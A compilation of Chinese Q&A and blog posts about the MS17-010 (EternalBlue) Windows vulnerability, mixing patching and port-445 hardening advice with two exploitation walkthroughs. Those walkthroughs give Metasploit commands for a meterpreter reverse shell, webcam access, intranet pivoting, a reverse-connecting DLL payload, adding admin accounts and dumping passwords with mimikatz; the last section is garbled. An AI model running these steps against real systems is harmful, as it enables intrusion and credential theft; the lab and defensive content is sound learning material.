⑴ win7的ms17-010补丁安装不了,显示这个
首先要停止windows update服务,但win10 在控制面板里是关不掉的,我们就要进入回组策略文件答,在运行里输入gpedit.msc 进入。然后在计算机配置>管理模板>windows组件 >windows更新 >配置自动更新为禁用.
关闭后我们就要删除临时更新文件 进入c:\Windows\SoftwareDistribution (c是系统盘),删除datastore 里所有的文件。如果想清楚已下载更新的话,就要清楚download 文件里的所有。
然后再在组策略里打开自动更新。 建议大家打开自动更新,自动更新会更新漏洞和驱动程序,我们安装驱动也要用这个方式安装为佳哦。
⑵ ms17010漏洞的简单利用
(第一次在发表文章,没啥经验,分享一些学习经验。大佬们多多包涵,也希望大家能够指出我的错误。)
靶机:windows7 x64 IP:192.168.1.5
攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3
两台主机在同一网段内;win7关闭防火墙并且开启445端口。
1、使用ipconfig/ifconfig分别查看win7和kali的ip。
2、打开msf工具
每次开启都会有不同的界面
3、使用search命令搜索ms17_010
4、选择模块和设置条件
使用use来选择第三个模块,可以直接 use 2,也可以打全
然后用set来设置靶机IP set rhost 192.168.1.5
设置本机IP set lhost 192.168.1.3
设置监听端口 set lport 8888 不设置则默认4444端口
设置payload set payload windows/x64/meterpreter/reverse_tcp
还有另外一个payload能用于本实验,具体可以 show payloads 查看
最后,可以使用show options检查所有信息
5、开始渗透 run
稍等片刻 看到win则成功创建会话
6、成功之后,可以开启Windows7的摄像头,截图等等
具体可以用help查看
1、关闭445端口
2、打开防火墙,安装安全软件
3、安装对应补丁,这里就不放链接了
关闭445端口的方法:
1)打开控制面板----Windows防火墙----高级设置
2)点击新建规则,设置端口号的规则并且命名(如图)
msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。
⑶ 请问大佬有微软永恒之蓝补丁ms17010补丁 V1.0软件免费百度云资源吗
链接:
提取码:4xqu
软件名称:微软永恒之蓝补丁ms17010补丁V1.0
语言:简体中文
大小:143KB
类别:系统工具
介绍:微软永恒之蓝ms17010补丁下载,本补丁是微软官方更新的针对修复永恒之蓝病毒漏洞的最新补丁,其实这个补丁早在3月份就发布了,不过当时NSA的“永恒之蓝”黑客武器也没有泄露。
5月12日,一个根据永恒之蓝黑客武器制造的蠕虫勒索病毒肆虐了全球范围内的多家机构、学校、企业的电脑,并要求用户缴纳一定数量比特币不然就把电脑“撕票”。本站带来微软永恒之蓝ms17010补丁官方下载,请大家尽快更新安装以免遭病毒入侵。
⑷ 内网渗透之ms17-010
在内网渗透时,通常挂上代理后。在内网首先会打啵ms17-010。在实战中,使用msf的ms17-010模块,数次没有反弹成功。基于此,到底如何成功利用ms17-010
在msf成功接收session之后,添加路由
然后使用ms17-010相关的模块进行探测是否存在该漏洞。
尝试利用
LHOST配置为公网IP
可以看到success。漏洞是可以利用的,但始终没有session。不知道什么原因。
参考资料: 利用公网Msf+MS17010跨网段攻击内网
笔者在本地搭建环境,也是同样的结果。尝试更改payload为
bind_tcp攻击者去连接,容易被防火墙和杀毒发现
可以成功生成session,但并不稳定,且在run的过程中非常容易导致本来的session died
在实际使用msf的ms17_010_eternalblue模块时,笔者观察到有几个弊端。
1.session 很容易died
2.ms17_010_eternalblue模块利用起来非常耗时
3.无法利用成功
有大佬推荐使用原始的fb.py。但配置起来感觉麻烦一些。
所以。笔者从i春秋上找到一个轻便的方程式漏洞利用工具。
参考资料: 萌新初试MS17-010方程式漏洞
工具使用起来很简单。只需要msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll 。再依次点击Eternalblue、Doublepulsar 的Attack即可。在Attack的时候,调用x64.dll动态链接库,反弹到公网IP。原理和fb.py一样。
笔者通过ew代理进内网后,在跳板机上上传了方程式漏洞利用工具、网安永恒之蓝检测工具。两者结合,威力巨大。成功利用ms17-010
对于windows server 2008 ,msfvenom生成x64.dll文件
msf配置
将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。
对于windows server 2003 ,msfvenom生成x86.dll文件
msf配置
进一步利用的一些命令
实际测试发现这种session非常稳定。不会轻易go die
实际测试server 2003的ms17-010时,有时候多次执行后msf就接收不到session,而且ms17-010利用时,脆弱的server 2003非常容易蓝屏。
所以笔者选择一种稳定可靠一些的办法。
先通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道[accessible named pipe]
参考资料 Metasploit 「永恒之蓝」两种模块的利弊
system的权限可以直接激活guest用户添加管理员组。
注意:使用ms17_010_psexec需要指定管理员的用户名、密码,否则没有session
同样的操作,载入mimikatz,读取管理员密码。
⑸ WannaCry勒索病毒是什么MS17-010漏斗如何利用
没有被感染,预防防御办法(非常重要)
(1) 首要任务确定您的反病毒软件更新到最新并可以查杀该勒索软件。 Microsoft 反病毒产品病
毒库版本 1.243.290.0 及以上可以查杀当前发现的这一变种。如您使用其他反病毒软件,建议
与相应厂商确认。
(2) 确保终端用户理解他们不应打开任何可疑的附件,即使他们看到一个熟悉的图标( PDF 或
Office 文档)。用户不应在任何情况下执行附件中包含的可执行文件。如果有任何疑问,请用
户联系 IT 管理部门。
(3) 确保 MS17-010 在所有计算机上安装,推荐安装最新的 Microsoft 安全补丁,并将其他第
三方软件更新到最新。
? 变通办法
如暂时难以完成补丁安装, 以下变通办法在您遇到的情形中可能会有所帮助:
? 禁用 SMBv1
对于运行 Windows Vista 及更高版本的客户
请参阅 Microsoft 知识库文章 2696547
适用于运行 Windows 8.1 或 Windows Server 2012 R2 及更高版本的客户的替代方法
对于客户端操作系统:
1. 打开“控制面板”,单击“程序”,然后单击“打开或关闭 Windows 功能”。
2. 在“Windows 功能”窗口中,清除“SMB 1.0/CIFS 文件共享支持”复选框,然后单击
“确定”以关闭此窗口。
3. 重启系统。
⑹ 如何修复ms17-010漏洞,关闭445端口
关闭445端口后 是无法使用共享服务的
网络安全专家建议,用户要断网开机,即先拔掉网线再开机,这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁,或安装各家网络安全公司针对此事推出的防御工具,才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘,备份完后脱机保存该磁盘,同时对于不明链接、文件和邮件要提高警惕,加强防范。
临时解决方案:
1、开启系统防火墙
2、利用系统防火墙高级设置阻止向445端口进行连接(该操作会影响使用445端口的服务)
3、打开系统自动更新,并检测更新进行安装
Win7、Win8、Win10的处理流程
1、打开控制面板-系统与安全-Windows防火墙,点击左侧启动或关闭Windows防火墙。
2、选择启动防火墙,并点击确定
3、点击高级设置
4、点击入站规则,新建规则
5、选择端口,下一步
6、特定本地端口,输入445,下一步
7、选择阻止连接,下一步
8、配置文件,全选,下一步
9、名称,可以任意输入,完成即可。
XP系统的处理流程
1、依次打开控制面板,安全中心,Windows防火墙,选择启用
2、点击开始,运行,输入cmd,确定执行下面三条命令:net stop rdr 、net stop srv 、net stop netbt
⑺ 怎么对系统ms17010 ms10061 ms14608,ms08067,ms09050补丁更新
试试腾讯电脑管家杀毒+管理2合1自修复漏洞:第间发现并修复系统存高内危漏洞打扰您情况自系容统打漏洞补丁轻轻松松病毒木马拒门外自修复漏洞 电脑管家发现高危漏洞(仅包括高危漏洞包括其漏洞)第间自进行修复需用户参与程度保证用户电脑安全尤其适合、孩或计算机初级水平用户使用